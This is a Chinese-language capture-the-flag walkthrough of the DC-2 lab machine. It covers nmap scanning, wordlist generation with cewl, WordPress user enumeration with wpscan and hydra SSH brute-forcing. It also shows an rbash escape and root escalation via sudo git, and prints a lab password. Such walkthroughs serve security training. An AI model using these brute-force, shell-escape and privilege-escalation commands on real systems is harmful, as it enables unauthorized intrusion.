DC系列靶机2-9百度网盘下载链接链接:https://pan.baidu.com/s/1BHatml6HHnT-jsoZ-eHfsw
提取码:1xft
和DC1一样,先主机发现找到靶机的ip
使用nmap
nmap -sP 192.168.211.0/24
根据MAC地址可以确定靶机的ip为192.168.211.134
然后扫描该ip所开放的端口服务
nmap -A 192.168.211.134 -p 1-65535
目标开放了80端口和7744端口,7744端口上是ssh,80端口的web页面需要修改hosts才能访**/etc/hosts 需要本地dns解析**
Windows下hosts文件路径
成功访问该网站并且得到flag1,提示我们使用cewl
该网站是由WordPress写的
cewl(这个工具会自动爬取网站,并根据网站关键字生成字典)
使用方法 :cewl dc-2 >pwd.dic
由于是个网站,我们进行网站目录扫描
使用msf对网站进行扫描
search scanner/http/dir
use auxiliary/scanner/http/dir_scanner
成功扫描到两个目录
进行访问,但是没多大帮助
然后我们使用工具wpscan
更新:wpscan --update
这里发现kali出了点问题,wpscan怎么更新都扫描失败,然后就更换成kali2020.1版本进行扫描
扫描网站
对于WordPress网站,可以使用wp-scan进行扫描
wpscan --url dc-2 -e
然后获取WordPress里面的用户账号
wpscan --url dc-2 -e u 发现有三个用户
将这三个用户名写入一个字典中用来爆破
然后我们进入网站后台
爆破出来两个
登陆Jerry的之后发现flag2
由于前面发现开放了7744端口为ssh端口,所以我们可以尝试使用刚才的字典进行ssh端口爆破
hydra -L user.txt -P pwd.dic ssh://192.168.211.134 -s 7744
然后使用tom和parturient登陆ssh tom@192.168.211.134 -p 7744
登陆成功,并且发现flag3,但是我们并不能查看
遇到了-rbash限制,所以我们要绕过rbash
导入$PATH
BASH_CMDS[a]=/bin/bash;a
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
这样我们就成功访问了flag3.txt
flag3将我们指向jerry,
发现Jerry为/bin/bash/说明可以登陆
su jerry
在home目录下发现flag4
但是我们还不是root用户,接下来就要用到git提权
sudo git --help让我们git参数强制进入到交互模式
sudo git -p --help强制进入交互模式后再调用bash进入root权限
最后在root目录下发现flag5